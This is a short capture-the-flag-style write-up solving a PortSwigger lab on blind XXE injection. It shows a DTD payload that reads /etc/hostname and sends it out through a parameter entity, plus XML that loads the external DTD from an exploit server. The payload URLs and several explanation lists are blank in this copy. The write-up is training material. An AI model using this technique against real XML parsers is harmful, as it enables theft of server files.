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Exploiting blind XXE to exfiltrate data using a malicious external DTD | Dec 25, 2022


Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: Exploiting blind XXE to exfiltrate data using a malicious external DTD! Without further ado, let's dive in.


This lab has a "Check stock" feature that parses XML input but does not display the result.

To solve the lab, exfiltrate the contents of the /etc/hostname file.


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In previous labs, we found that there is an XXE injection vulnerability in the "Check stock" feature, which parses XML input.

Original XML data:

<?xml version="1.0" encoding="UTF-8"?>

Invalid XML data:

<?xml version="1.0" encoding="UTF-8"?>

As you can see, it doesn't display the response. Hence, this is a blind XXE injection.

To exploit that, we can host a malicious DTD(Document Type Definition) to exfiltrate target data.

Let's use the exploit server to host an external DTD file:

Then, we can build our XXE payload:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM ';'>">

The above DTD will:

Next, we can send an XXE payload, which fetches our external malicious DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY % xxe SYSTEM ""> %xxe;]>

The second line will:

Let's send the above XXE payload!

Exploit server access log:

We succesfully extracted the content of /etc/hostname!

What we've learned:

  1. Exploiting blind XXE to exfiltrate data using a malicious external DTD